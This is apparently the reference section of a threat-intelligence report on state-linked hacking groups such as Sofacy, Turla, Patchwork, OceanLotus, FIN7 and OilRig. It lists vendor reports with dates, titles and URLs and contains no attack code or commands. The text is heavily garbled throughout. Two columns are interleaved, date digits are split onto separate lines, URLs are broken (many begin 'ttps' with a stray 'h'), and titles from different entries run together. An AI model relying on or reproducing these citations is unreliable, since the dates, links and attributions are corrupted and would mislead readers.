securelist.com/a-slice-of-2017-sofacy-activity/83930/ https://pylos.co/2018/11/18/cozybear-in-from-the-cold/
8/02/2018, PaloAlto, Sofacy Attacks Multiple Government
2 ttps://securityaffairs.co/wordpress/78195/apt/apt29-malware-
h
Entities, https://unit42.paloaltonetworks.com/unit42-sofacy- analysis.html
attacks-multiple-government-entities/ https://www.fireeye.com/blog/threat-research/2018/11/not-
9/03/2018, Kaspersky, Masha and these Bears, https://securelist.
0 so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-
com/masha-and-these-bears/84311/ phishing-campaign.html
5/03/2018, PaloAlto, Sofacy Uses DealersChoice to Target
1 ATK6
European Government Agency, https://unit42.paloaltonetworks.
com/unit42-sofacy-uses-dealerschoice-target-european- MITRE, Dragonfly 2.0, https://attack.mitre.org/groups/G0074/
government-agency/ 17/12/2010, Symantec, Dream Loader: the new bot C&C
4/04/2018, ESET, Sednit update: Analysis of Zebrocy, https://www.
2 engine of your dreams
welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ 07/07/2014, Symantec, Dragonfly: Cyberespionage Attacks
6/06/2018, PaloAlto, Sofacy Group’s Parallel Attacks, https://
0 Against Energy Suppliers
unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/ 27/10/2014, Netresec, Full Disclosure of Havex Trojans
7/09/2018, ESET, LoJax: First UEFI rootkit found in the wild,
2 20/10/2017, Symantec, Dragonfly: Western energy sector
courtesy of the Sednit group, https://www.welivesecurity.com/ targeted by sophisticated attack group
wp-content/uploads/2018/09/ESET-LoJax.pdf
20/10/2017, US-CERT, Alert (TA17-293A) Advanced Persistent
4/10/2018, Symantec, APT28: New Espionage Operations Target
0 Threat Activity Targeting Energy and Other Critical Infrastructure
Military and Government Organizations, https://www.symantec. Sectors
com/blogs/election-security/apt28-espionage-military-government
16/03/2018, Cylance, Energetic DragonFly DYMALLOY Bear 2.0
0/11/2018, ESET, Sednit: What’s going on with Zebrocy?, https://
2
www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/ 04/04/2018, NCSC, Hostile state actors compromising UK
organisations with focus on engineering and industrial control
0/11/2018, PaloAlto, Sofacy Continues Global Attacks and Wheels
2 companies
Out New ‘Cannon’ Trojan, https://unit42.paloaltonetworks.com/
unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/ 11/07/2019, Dell Secureworks. MCMD Malware Analysis
9/11/2018, Accenture, SNAKEMACKEREL, https://www.

2 11/07/2019, Dell Secureworks, Updated Karagany Malware
accenture.com/t20181129t203820z__w__/us-en/_acnmedia/ Targets Energy Sector
pdf-90/accenture-snakemackerel-delivers-zekapab-malware.pdf 24/07/2019, Dell Secureworks, Resurgent Iron Liberty Targeting
2/12/2018, PaloAlto, Dear Joohn: The Sofacy Group’s Global
1 Energy Sector
Campaign, https://unit42.paloaltonetworks.com/dear-joohn-
sofacy-groups-global-campaign/ ATK8
S ecurity Affairs, 2017: https://securityaffairs.co/wordpress/62811/
8/12/2018, PaloAlto, Sofacy Creates New ‘Go’ Variant of
1 malware/babar-2007-sample.html
Zebrocy Tool, https://unit42.paloaltonetworks.com/sofacy-
creates-new-go-variant-of-zebrocy-tool/ Infosec Institute, 2015: https://resources.infosecinstitute.com/
animal-farm-apt-and-the-shadow-of-france-intelligence/#gref
2/05/2019, ESET, A journey to Zebrocy land, https://www.
2
welivesecurity.com/2019/05/22/journey-zebrocy-land/ S ecurity Affairs, 2015: http://securityaffairs.co/wordpress/34462/
intelligence/babar-casper-french-intelligence.html
5/08/2019, Microsoft, Corporate IoT – a path to intrusion,
0
https://msrc-blog.microsoft.com/2019/08/05/corporate-iot- Security Affairs, 2015: http://securityaffairs.co/ordpress/38204/
a-path-to-intrusion/ cyber-crime/dino-malware-animal-farm.html
ESET, 2015: https://www.welivesecurity.com/2015/03/05/casper-
ATK3 malware-babar-bunny-another-espionage-cartoon/
019, The All-Purpose Sword: North Korea’s Cyber Operations
2
and Strategies, https://ccdcoe.org/uploads/2019/06/Art_08_The- ESET, 2015: https://www.welivesecurity.com/2015/06/30/
All-Purpose-Sword.pdf dino-spying-malware-analyzed/
Kaspersky, 2015: https://securelist.com/animals-in-the-apt-
ATK4 farm/69114/
MITRE, APT37, https://attack.mitre.org/groups/G0067/
ATK11
7/06/2016, Kaspersky, Operation Daybreak, https://securelist.
1
com/operation-daybreak/75100/ MITRE, Patchwork, https://attack.mitre.org/groups/G0040/
6/01/2018, Talos, Korea In The Crosshairs, https://blog.

1 0/05/2013, Operation Hangover, http://www.thecre.com/
2
talosintelligence.com/2018/01/korea-in-crosshairs.html fnews/wp-content/uploads/2013/05/Unveiling_an_Indian_
Cyberattack_Infrastructure.pdf
0/02/2018, FireEye, APT37 (Reaper): The Overlooked North Korean
2
Actor, https://www.fireeye.com/blog/threat-research/2018/02/ 7/07/2016, Cymmetria, Unveiling PATCHWORK The Copy-
0
apt37-overlooked-north-korean-actor.html Paste APT, https://s3-us-west-2.amazonaws.com/cymmetria-blog/
public/Unveiling_Patchwork.pdf
3/05/2018, AhnLab, Detailled Analysis of Red Eyes Hacking
0
Group, https://global.ahnlab.com/global/upload/download/ 8/07/2016, Kaspersky, The Dropping Elephant – aggressive
0
techreport/[AhnLab]%20Red_Eyes_Hacking_Group_Report%20 cyber-espionage in the Asian region, https://securelist.com/
(1).pdf the-dropping-elephant-actor/75328/
211
References _
5/07/2016, Symantec, Patchwork cyberespionage group expands

2 30/11/2008, ThreatExpert, Agent.btz - A Threat That Hit Pentagon
targets from governments to wide range of industries, https://www.
The NewYork Times, 25/08/2010, Military Computer Attack
symantec.com/connect/blogs/patchwork-cyberespionage-group-
Confirmed
expands-targets-governments-wide-range-industries
G -Data, 28/02/2014, Uroburos - highly complex espionage
8/08/2016, Forcepoint, MONSOON - Analysis Of An APT
0
software with Russian roots
Campaign, https://www.forcepoint.com/blog/x-labs/monsoon-
analysis-apt-campaign BAE Systems, 02/2014, The Snake Campaign
0/01/2017, PaloAlto, Downeks and Quasar RAT Used in
3 Kaspersky, 12/03/2014, Agent.btz: a Source of Inspiration?
Recent Targeted Attacks Against Governments, https://unit42.
d eresz@gmail.com & tecamac@gmail.com, 12/03/2014,
paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-
Uroburos: the snake rootkit
in-recent-targeted-attacks-against-governments/
Kaspersky, 07/08/2014, The Epic Turla Operation
5/04/2017, Fortinet, In-Depth Look at New Variant of
0
MONSOON APT Backdoor, Part 1, https://www.fortinet.com/ Kaspersky, 08/12/2014, The ‘Penquin’ Turla - A Turla/Snake/
blog/threat-research/in-depth-look-at-new-variant-of-monsoon- Uroburos Malware for Linux
apt-backdoor-part-1.html
Kaspersky, 09/09/2015, Satellite Turla: APT Command and
5/04/2017, Fortinet, In-Depth Look at New Variant of
0 Control in the Sky
MONSOON APT Backdoor, Part 2, https://www.fortinet.com/
FireEye, 11/2015, PINPOINTING TARGETS: SECURITY REIMAGINED
blog/threat-research/in-depth-look-at-new-variant-of-monsoon-
Exploiting Web Analytics to Ensnare Victims
apt-backdoor-part-2.html
Symantec, 14/01/2016, The Waterbug attack group
2/06/2017, bellingcat, Bahamut, Pursuing a Cyber Espionage
1
Actor in the Middle East, https://www.bellingcat.com/news/ MELANI:GovCERT, 23/05/2016, APT Case RUAG
mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-
yle, 14/01/2016, Russian group behind 2013 ForeignMinistry hack
middle-east/
BitDefender, 30/06/2016, Pacifier APT
07/03/2018, Patchwork Continues to Deliver BADNEWS o
the Indian Subcontinent, https://unit42.paloaltonetworks.com/ PassiveTotal, 17/08/2016, Snakes in the Satellites: On-going
unit42-patchwork-continues-deliver-badnews-indian-subcontinent/ Turla Infrastructure
8/03/2018, Netscout, Donot Team Leverages New Modular
0 Kaspersky, 02/02/2017, KopiLuwak: A New JavaScript Payload
Malware Framework in South Asia, https://www.netscout.com/ from Turla
blog/asert/donot-team-leverages-new-modular-malware-
ESET, 30/03/2017, Carbon Paper: Peering into Turla’s second
framework-south-asia
stage backdoor
30/03/2018, 360.net, Analysis of the latest cyberattack activities
PaloAlto, 03/05/2017, Kazuar: Multiplatform Espionage Backdoor
of sensitive organizations in China by the APT organization,
with API Access
https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/
ESET, 06/06/2017, Turla’s watering hole campaign: An updated
07/06/2018, Volexity, Patchwork APT Group Targets US Think
Firefox extension abusing Instagram
Tanks, https://www.volexity.com/blog/2018/06/07/patchwork-
apt-group-targets-us-think-tanks/ ProofPoint, 17/08/2017, Turla APT actor refreshes KopiLuwak
JavaScript backdoor for use in G20-themed attack
29/08/2018, TrendMicro, The Urpage Connection to Bahamut,
Confucius and Patchwork, https://blog.trendmicro.com/trendlabs- Kaspersky, 30/08/2017, Introducing WhiteBear
security-intelligence/the-urpage-connection-to-bahamut-confucius-
ESET, 30/08/2017, Gazing at Gazer - Turla’s new second stage
and-patchwork/
backdoor
09/10/2018, TrendMicro, Untangling the Patchwork Cyberespionage
NCSC, 22/11/2017, Advisory: Turla group malware
Group, https://documents.trendmicro.com/assets/tech-brief-
untangling-the-patchwork-cyberespionage-group.pdf ESET, 08/01/2018, Diplomats in Eastern Europe bitten by a
Turla mosquito
9/10/2018, TrendMicro, Untangling the Patchwork Cyberespionage
0
Group (Technical Brief), https://documents.trendmicro.com/assets/ NCSC, 18/01/2018, Turla group update Neuron malware
tech-brief-untangling-the-patchwork-cyberespionage-group.
The Guardian, 01/03/2018, German government intranet under
pdf?platform=hootsuite
‘ongoing attack’
9/11/2018, 360.net, Analysis Of Targeted Attack Against
2
E SET, 22/05/2018, Turla Mosquito: A shift towards more
Pakistan By Exploiting InPage Vulnerability And Related APT
generic tools
Groups, https://ti.360.net/blog/articles/analysis-of-targeted-
attack-against-pakistan-by-exploiting-inpage-vulnerability-and- ESET, 22/08/2018, Turla Outlook Backdoor - Analysis of an
related-apt-groups-english/ unusual Turla backdoor
02/08/2019, NSHC, SectorE02 Updates YTY Framework in Kaspersky, 04/10/2018, Shedding Skin – Turla’s Fresh Faces
New Targeted Campaign Against Pakistan Government, https://
ESET, 07/05/2019, Turla LightNeuron: An email too far
threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-
in-new-targeted-campaign-against-pakistan-government/ ESET, 29/05/2019, A dive into Turla PowerShell usage
Symantec, 19/06/2019, Waterbug: Espionage Group Rolls Out
ATK13 Brand-New Toolset in Attacks Against Governments
Malpedia, Turla group
APT Groups and Operations ATK14
http://blog.talosintelligence.com/2017/10/bad-rabbit.html
MITRE ATT&CK, Group: Turla, Waterbug, WhiteBear
https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-
L os Angeles Times, 28/11/2008, Pentagon computer networks
9ea1d8961d3b
attacked

ttps://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-
h https://www.eset.com/int/greyenergy-exposed/
was-smokescreen.html
ttps://www.fireeye.com/blog/threat-research/2017/10/backswing-
h
https://blog.malwarebytes.com/cybercrime/2017/07/keeping- pulling-a-badrabbit-out-of-a-hat.html
up-with-the-petyas-demystifying-the-malware-family/
ttps://www.fireeye.com/blog/threat-research/2018/07/microsoft-
h
h ttps://blog.malwarebytes.com/threat-analysis/2017/06/ office-vulnerabilities-used-to-distribute-felixroot-backdoor.html
eternalpetya-lost-salsa20-key/
https://www.gdatasoftware.com/blog/2017/07/29859-who-
h ttps://blog.malwarebytes.com/threat-analysis/2017/06/ is-behind-petna
eternalpetya-yet-another-stolen-piece-package/
ttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/
h
https://blog.reversinglabs.com/blog/reversinglabs-yara-rule- blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-
detects-badrabbit-encryption-routine-specifics to-assess-real-world-resilience/
ttps://blog.talosintelligence.com/2017/06/worldwide-ransomware-
h https://www.nozominetworks.com/blog/greyenergy-malware-
variant.html research-paper-maldoc-to-backdoor/
h ttps://blog.talosintelligence.com/2017/07/the-medoc- https://www.riskiq.com/blog/labs/badrabbit/ ATRIBUTES IT
connection.html
ttps://www.theguardian.com/technology/2017/jul/03/notpetya-
h
https://blog.trendmicro.com/trendlabs-security-intelligence/ malware-attacks-ukraine-warrant-retaliation-nato-researcher-
new-killdisk-variant-hits-financial-organizations-in-latin-america/ tomas-minarik
https://blog.yoroi.company/research/greyenergy-welcome-to-2019/ https://www.us-cert.gov/ncas/alerts/TA17-163A
ttps://dragos.com/wp-content/uploads/2017-Review-Industrial-
h ttps://www.welivesecurity.com/2015/07/30/operation-potao-
h
Control-System-Threats.pdf express/
https://dragos.com/wp-content/uploads/CrashOverride-01.pdf h ttps://www.welivesecurity.com/2016/01/03/blackenergy-
sshbeardoor-details-2015-attacks-ukrainian-news-media-
h ttps://ics.sans.org/blog/2016/01/09/confirmation-of-a-
electric-industry/
coordinated-attack-on-the-ukrainian-power-grid
ttps://www.welivesecurity.com/2016/01/04/blackenergy-trojan-
h
https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/
strikes-again-attacks-ukrainian-electric-power-industry/
ttps://labsblog.f-secure.com/2017/06/30/eternal-petya-from-
h
ttps://www.welivesecurity.com/2016/01/11/blackenergy-and-
h
a-developers-perspective/
the-ukrainian-power-outage-what-we-really-know/
ttps://labsblog.f-secure.com/2017/06/30/what-good-is-a-not-
h
ttps://www.welivesecurity.com/2016/01/20/new-wave-attacks-
h
for-profit-eternal-petya/
ukrainian-power-industry/
https://marcusedmondson.com/2019/01/18/black-energy-analysis/
ttps://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-
h
ttps://medium.com/@thegrugq/pnyetya-yet-another-ransomware-
h linux-demands-250k-ransom-cant-decrypt/
outbreak-59afd1ee89d4
https://www.welivesecurity.com/2017/06/30/telebots-back-
https://securelist.com/bad-rabbit-ransomware/82851/ supply-chain-attacks-against-ukraine/
https://securelist.com/be2-custom-plugins-router-abuse-and- ttps://www.welivesecurity.com/2017/07/04/analysis-of-telebots-
h
target-profiles/67353/ cunning-backdoor/
h ttps://securelist.com/be2-extraordinary-plugins-siemens- https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-
targeting-dev-fails/68838/ petya-back/
ttps://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-
h ttps://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-
h
spearphishing-with-word-documents/73440/ variant-infamous-diskcoder-ransomware/
h ttps://securelist.com/expetrpetyanotpetya-is-a-wiper-not- https://www.welivesecurity.com/2018/10/11/new-telebots-
ransomware/78902/ backdoor-linking-industroyer-notpetya/
https://securelist.com/from-blackenergy-to-expetr/78937/ ttps://www.welivesecurity.com/2018/10/17/greyenergy-updated-
h
arsenal-dangerous-threat-actors/
https://securelist.com/greyenergys-overlap-with-zebrocy/89506/
ttps://www.welivesecurity.com/wp-content/uploads/2018/10/
h
https://securelist.com/schroedingers-petya/78870/
ESET_GreyEnergy.pdf
ttps://securityaffairs.co/wordpress/79967/malware/greyenergy-
h
https://www.wired.com/story/badrabbit-ransomware-notpetya-
welcome-to-2019.html
russia-ukraine/
https://threatpost.com/ukrainian-man-arrested-charged-in-
http://www.intezer.com/notpetya-returns-bad-rabbit/
notpetya-distribution/127391/
ttp://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-
h
ttps://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-
h
disruptive-killdisk-attacks/
you-should-worry-too/
https://web.archive.org/web/20160406000554/http://www. ATK15
isightpartners.com/2016/01/ukraine-and-sandworm-team/ MITRE ATT&CK, Group: Threat Group-3390, TG-3390, …
ttps://www.bleepingcomputer.com/news/security/ransomware-
h Malpedia, Emissary Panda
attacks-continue-in-ukraine-with-mysterious-wannacry-clone/
APT Groups and Operations
https://www.cfr.org/interactive/cyber-operations/black-energy
05/08/2015, Dell Secureworks, Threat Group 3390 Cyberespionage
https://www.crowdstrike.com/blog/fast-spreading-petrwrap-
ransomware-attack-combines-eternalblue-exploit-credential-stealing/ 6/09/2015, TrendMicro, Operation Iron Tiger: Attackers Shift
1
from East Asia to the United States Appendix
ttps://www.crowdstrike.com/blog/petrwrap-technical-analysis-
h
part-2-further-findings-and-potential-for-mbr-recovery/ 17/10/2016, ThreatConnect, A Tale of Two Targets
213
References _
7/06/2017, Dell Secureworks, BRONZE UNION Cyberespionage

2 ATK23
Persists Despite Disclosures 6/09/2013, Kaspersky, THE ‘ICEFOG’ APT: A TALE OF CLOAK
2
1/02/2018, BitDefender, Operation PZChao: a possible return
0 AND THREE DAGGERS
of the Iron Tiger APT 14/01/2014, Kaspersky, The Icefog APT Hits US Targets With
7/04/2018, NCC Group, Decoding network data from a
1 Java Backdoor
Gh0st RAT variant 03/06/2019, FireEye, Into the Fog - The Return of ICEFOG APT
8/05/2018, NCC Group, Emissary Panda – A potential new
1
malicious tool ATK27
3/06/2018, Securelist, LuckyMouse hits national data center
1 8/01/2018, Lookout, Dark Caracal - Cyber-espionage at
1
to organize country-level waterholing campaign a Global ScaleSECURITY RESEARCH REPORT, https://info.
lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_
3/07/2018, CSE, Chinese APT 27’s long-term espionage
2 srr_20180118_us_v.1.0.pdf
campaign in Syria is still ongoing
20/01/2018, YA LIBNAN, Dark Caracal: Analysis of Lebanon’s
7/02/2019, Dell Secureworks, A Peek into BRONZE UNION’s
2 recently discovered state-sponsored hacking, http://yalibnan.
Toolbox com/2018/01/20/dark-caracal-analysis-of-lebanons-recently-
8/05/2019, PaloAlto, Emissary Panda Attacks Middle East
2 discovered-state-sponsored-hacking/
Government Sharepoint Servers MITRE, Dark Caracal, https://attack.mitre.org/groups/G0070/
19/01/2018, Secuirty Affairs, Dark Caracal APT – Lebanese
ATK17 intelligence is spying on targets for years, https://securityaffairs.
ireEye, We believe we’re seeing an evolution and development in
F co/wordpress/67915/hacking/dark-caracal-apt.html
Iranian-based cyber activity. In years past, Iranian actors primarily
committed politically motivated website defacement and DDoS 1 2/02/2018, Secuirty Affairs, Researchers from CSE ZLAB
attacks, https://www.fireeye.com/content/dam/fireeye-www/ malware Analysis Laboratory analyzed a set of samples of the
global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf Pallas malware family used by the Dark Caracal APT in its hacking
operations., https://securityaffairs.co/wordpress/68983/apt/
4/04/2018, New MacOS Backdoor Linked to OceanLotus
0 dark-caracal-pallas-malware.html
Found, https://blog.trendmicro.com/trendlabs-security-intelligence/
new-macos-backdoor-linked-to-oceanlotus-found/ 14/05/2019, DARKNET DIARIES, EP 38: Dark Caracal, https://
darknetdiaries.com/episode/38/
8/05/2019, OceanLotus’ Attacks to Indochinese Peninsula:
0
Evolution of Targets, Techniques and Procedure https://ti.360. ATK29
net/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-
evolution-of-targets-techniques-and-procedure/ 6/03/2018, FireEye, Suspected Chinese Cyber Espionage Group
1
(TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries
0/03/2019, Fake or Fake: Keeping up with OceanLotus decoys,
2
https://www.welivesecurity.com/2019/03/20/fake-or-fake- 10/07/2018, FireEye, Chinese Espionage Group TEMP.Periscope
keeping-up-with-oceanlotus-decoys/ Targets Cambodia Ahead of July 2018 Elections and Reveals
Broad Operations Globally
1/03/2018, OceanLotus Old techniques, new backdoor
0
https://www.welivesecurity.com/wp-content/uploads/2018/03/ 13/11/2018, Recorded Future, Chinese Threat Actor TEMP.
ESET_OceanLotus.pdf Periscope Targets UK-Based Engineering Company Using Russian
APT Techniques
2/04/209 Report: OceanLotus APT Group Leveraging
0
Steganography, https://threatvector.cylance.com/en_us/home/ ATK32
report-oceanlotus-apt-group-leveraging-steganography.html MITRE, FIN7, https://attack.mitre.org/groups/G0046/
7/10/2019, Report: The SpyRATs of OceanLotus, https://
1 07/03/2017, FireEye, FIN7 Spear Phishing Campaign Targets
threatvector.cylance.com/en_us/home/report-the-spyrats-of- Personnel Involved in SEC Filings, https://www.fireeye.com/blog/
oceanlotus.html threat-research/2017/03/fin7_spear_phishing.html
1/02/2019, Tracking OceanLotus’ new Downloader, KerrDown,
0 16/03/2017, ThreatPost, Fileless Malware Campaigns Tied to
https://unit42.paloaltonetworks.com/tracking-oceanlotus-new- Same Attacker, https://threatpost.com/fileless-malware-campaigns-
downloader-kerrdown/ tied-to-same-attacker/124369/
5/04/2019, OceanLotus On ASEAN Affairs, https://blog.telsy.
2 24/04/2017, FireEye, FIN7 Evolution and the Phishing LNK,
com/oceanlotus-on-asean-affairs/ https://www.fireeye.com/blog/threat-research/2017/04/fin7-
4/05/2017, FireEye, Cyber Espionage is Alive and Well: APT32
1 phishing-lnk.html
and the Threat to Global Corporations, https://www.fireeye.com/ 03/05/2017, FireEye, To SDB Or Not To SDB: FIN7 Leveraging
blog/threat-research/2017/05/cyber-espionage-apt32.html Shim Databases for Persistence, https://www.fireeye.com/blog/
9/01/2014, EFF, Vietnamese Malware Gets Very Personal,
1 threat-research/2017/05/fin7-shim-databases-persistence.html
https://www.eff.org/deeplinks/2014/01/vietnamese-malware- 09/06/2017, Morphisec, FIN7 TAKES ANOTHER BITE AT THE
gets-personal RESTAURANT INDUSTRY, http://blog.morphisec.com/fin7-attacks-
0/03/2010, The chilling effects of malware, https://security.
3 restaurant-industry
googleblog.com/2010/03/chilling-effects-of-malware.html 25/07/2017, Gigamon, Footprints of Fin7: Tracking Actor
8/05/2019, 360Net, OceanLotus’ Attacks to Indochinese Peninsula:
0 Patterns (Part 1), https://atr-blog.gigamon.com/2017/07/25/
Evolution of Targets, Techniques and Procedure, https://ti.360. footprints-of-fin7-tracking-actor-patterns-part-1/
net/blog/articles/oceanlotus-attacks-to-indochinese-peninsula- 26/07/2017, Gigamon, Footprints of FIN7: Tracking Actor
evolution-of-targets-techniques-and-procedure/ Patterns (Part 2), https://atr-blog.gigamon.com/2017/07/26/
5/04/2019, Telsy, OceanLotus On ASEAN Affairs, https://blog.
2 footprints-of-fin7-tracking-actor-patterns-part-2/
telsy.com/oceanlotus-on-asean-affairs/

1/07/2017, ProofPoint, FIN7/Carbanak threat actor unleashes
3 Malpedia, MAGNALLIUM
Bateleur JScript backdoor, https://www.proofpoint.com/us/
Pastebin.com, 25/11/2012, PARASTOO - 1
threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-
jscript-backdoor euters, 29/05/2014, Iranian hackers use fake Facebook accounts
R
to spy on U.S., others
3/10/2017, Morphisec, FIN7 DISSECTED: HACKERS ACCELERATE
1
PACE OF INNOVATION, http://blog.morphisec.com/fin7-attack- aspersky, 27/04/2016, Freezer Paper around Free Meat -
K
modifications-revealed Repackaging Open Source BeEF for Tracking and More
1/08/2018, FireEye, On the Hunt for FIN7: Pursuing an Enigmatic
0 I ran Threats, 06/02/2017, iKittens: Iranian Actor Resurfaces with
and Evasive Global Criminal Operation, https://www.fireeye.com/ Malware for Mac (MacDownloader)
blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-
ireEyen 20/09/2017, Insights into Iranian Cyber Espionage:
F
evasive-global-criminal-operation.html
APT33 Targets Aerospace and Energy Sectors and has Ties to
1/08/2018, WIRED, THE WILD INNER WORKINGS OF A
0 Destructive Malware
BILLION-DOLLAR HACKING GROUP, https://www.wired.com/
learSky, 05/12/2017, Charming Kitten: Iranian Cyber Espionage
C
story/fin7-wild-inner-workings-billion-dollar-hacking-group/
Against Human Rights Activists, Academic Researchers and
1/08/2018, ZDNet, DOJ arrests three Ukrainian nationals from
0 Media Outlets
Fin7 cybercrime group, https://www.zdnet.com/article/doj-arrests-
ecorded Future, 26/06/2019, Iranian Threat Actor Amasses
R
indicts-three-ukrainian-nationals-from-fin7-cybercrime-group/
Large Cyber Operations Infrastructure Network to Target Saudi
1/11/2018, Morphisec, FIN7 NOT FINISHED – MORPHISEC
2 Organizations
SPOTS NEW CAMPAIGN, http://blog.morphisec.com/fin7-not-
finished-morphisec-spots-new-campaign ATK40
0/03/2019, ThreatPost, Fin7 Ramps Up Campaigns With Two
2 P aloAlto, 08/11/2017, OilRig Deploys “ALMA Communicator”
Fresh Malware Samples, https://threatpost.com/fin7-ramps-up- – DNS Tunneling Trojan
campaigns-with-two-fresh-malware-samples/142975/ ireEye, 07/12/2017, New Targeted Attack in the Middle East
F
0/03/2019, ZDNet, Global threat group Fin7 returns with
2 by APT34, a Suspected Iranian Threat Group, Using CVE-2017-
new SQLRat malware, https://www.zdnet.com/article/global- 11882 Exploit
cybergang-fin7-returns-with-new-sqlrat-malware/ P aloAlto, 11/12/2017, OilRig Performs Tests on the TwoFace
0/03/2019, FlashPoint, FIN7 Revisited: Inside Astra Panel and
2 Webshell
SQLRat Malware, https://www.flashpoint-intel.com/blog/fin7- P aloAlto, 25/01/2018, OilRig uses RGDoor IIS Backdoor on
revisited:-inside-astra-panel-and-sqlrat-malware/ Targets in the Middle East
1/03/2019, DarkReading, FIN7 Cybercrime Gang Rises Again,
2 P aloAlto, 23/02/2018, OopsIE! OilRig Uses ThreeDollars to
https://www.darkreading.com/analytics/fin7-cybercrime-gang- Deliver New Trojan
rises-again-/d/d-id/1334228
yotron, 03/2018, OilRig is Back with Next-Generation Tools
N
1/03/2019, SecurityWeek, FIN7 Hackers Use New Malware
2 and Techniques
in Recent Attacks, https://www.securityweek.com/fin7-hackers-
use-new-malware-recent-attacks DragoS, 17/05/2018, CHRYSENE
1/03/2019, SCMagazine, Despite arrests FIN7 launched 2018
2 P aloAlto, 25/07/2018, OilRig Targets Technology Service Provider
attack campaigns featuring new malware, https://www.scmagazine. and Government Agency with QUADAGENT
com/home/security-news/despite-arrests-fin7-launched-2018- P aloAlto, 04/09/2018, OilRig targets a Middle Eastern Government
attack-campaigns-featuring-new-malware/ and Adds Evasion Techniques to OopsIE
8/05/2019, Kaspersky, Fin7 hacking group targets more than
0 P aloAlto, 12/09/2018, OilRig Uses Updated BONDUPDATER
130 companies after leaders’ arrest, https://www.kaspersky.com/ to Target Middle Eastern Government
about/press-releases/2019_fin7-hacking-group-targets-more-
than-130-companies-after-leaders-arrest P aloAlto, 16/11/2018, Analyzing OilRig’s Ops Tempo from
Testing to Weaponization to Delivery
8/05/2019, SecureList, FIN7.5: the infamous cybercrime rig
0
“FIN7” continues its activities, https://securelist.com/fin7-5-the- rowdStrike, 27/11/2018, Meet CrowdStrike’s Adversary of the
C
infamous-cybercrime-rig-fin7-continues-its-activities/90703/ Month for November: HELIX KITTEN
P aloAlto, 16/04/2019, DNS Tunneling in the Wild: Overview of
ATK33 OilRig’s DNS Tunneling
6/04/2016, Microsoft, PLATINIUM - Targeted attacks in South
2
Talos, 23/04/2019, DNSpionage brings out the Karkoff
and Southeast Asia
PaloAlto, 30/04/2019, Behind the Scenes with OilRig
5/05/2016, Kaspersky, CVE-2015-2545 Overview of current
2
threats leeping Computer, 03/06/2019, New Email Hacking Tool from
B
OilRig APT Group Leaked Online
05/06/2019, Kaspersky, Platinum is back
Marco Amilli, 06/06/2019, APT34: Jason project
MITRE, PLATINIUM, https://attack.mitre.org/groups/G0068/
eutopian.io, 16/06/2019, APT34 Tools Leak
ATK35
MITRE ATT&CK, Group: Charming Kitten ATK41
6/04/2017, FireEye, APT10 (MenuPass Group): New Tools,
0
MITRE ATT&CK, Group: APT33
Global Campaign Latest Manifestation of Longstanding Threat
APT Groups and Operations
5/08/2018, Intrusion Truth, APT10 was managed by the Tianjin
1
Malpedia, Charming Kitten bureau of the Chinese Ministry of State Security
Malpedia, APT33 3/09/2018, FireEye, APT10 Targeting Japanese Corporations
1
Using Updated TTPs
215
References _
6/02/2019, Recorded Future, APT10 Targeted NorwegianMSP

0 ATK66
and US Companies in Sustained Campaign 6/02/2015, Trend Micro, Operation Arid Viper: Bypassing the
1
24/05/2019, enSilo, Uncovering New Activity By APT10 Iron Dome, https://www.trendmicro.de/cloud-content/us/pdfs/
security-intelligence/white-papers/wp-operation-arid-viper.pdf
6/02/2017, Unit42, menuPass Returns with New Malware and
1
New Attacks Against Japanese Academics and Organizations 17/02/2015, Kaspersky, The Desert Falcons Targeted Attacks,
https://securelist.com/the-desert-falcons-targeted-attacks/68817/
23/12/2016, Cylance, Operation Dust Storm
18/09/2015, Proofpoint, Operation Arid Viper Slithers Back
6/06/2019, Reuters, Inside the West’s failed fight against China’s
2 into View, https://www.proofpoint.com/us/threat-insight/post/
‘Cloud Hopper’ hackers Operation-Arid-Viper-Slithers-Back-Into-View
ATK51 09/03/2017, 360 Core Security, Two-tailed scorpion tissue
(APT-C-23) stretches to the needles of the two countries, http://
6/03/2017, Morphisec, Morphisec Discovers New Fileless
1
blogs.360.cn/post/%E5%8F%8C%E5%B0%BE%E8%9D%8E%
Attack Framework
E7%BB%84%E7%BB%87%EF%BC%88apt-c-23%EF%BC%89%
6/09/2017, Malwarebytes, Elaborate scripting-fu used in
2 E4%BC%B8%E5%90%91%E5%B7%B4%E4%BB%A5%E4%B8%
espionage attack against Saudi Arabia Government entity A4%E5%9B%BD%E7%9A%84%E6%AF%92%E9%92%88.html
4/10/2017, Security 0wnage, Continued Activity targeting the
0 05/04/2017, Palo Alto Networks, Targeted Attacks in the Middle
Middle East East Using KASPERAGENT and MICROPSIA, https://unit42.
paloaltonetworks.com/unit42-targeted-attacks-middle-east-
4/11/2017, PaloAlto, Muddying the Water: Targeted Attacks
1
using-kasperagent-micropsia/
in the Middle East
14/06/2017, ThreatConnect, Phantom of the Opaera: New
2/03/2018, TrendMicro, Campaign Possibly Connected to
1
KASPERAGENT Malware Campaign, https://threatconnect.com/
“MuddyWater” Surfaces in the Middle East and Central Asia
blog/kasperagent-malware-campaign/
3/03/2018, FireEye, Iranian Threat Group Updates Tactics,
1
19/06/2017, Cisco Talos, Delphi Used to Score Against Palestine,
Techniques and Procedures in Spear Phishing Campaign
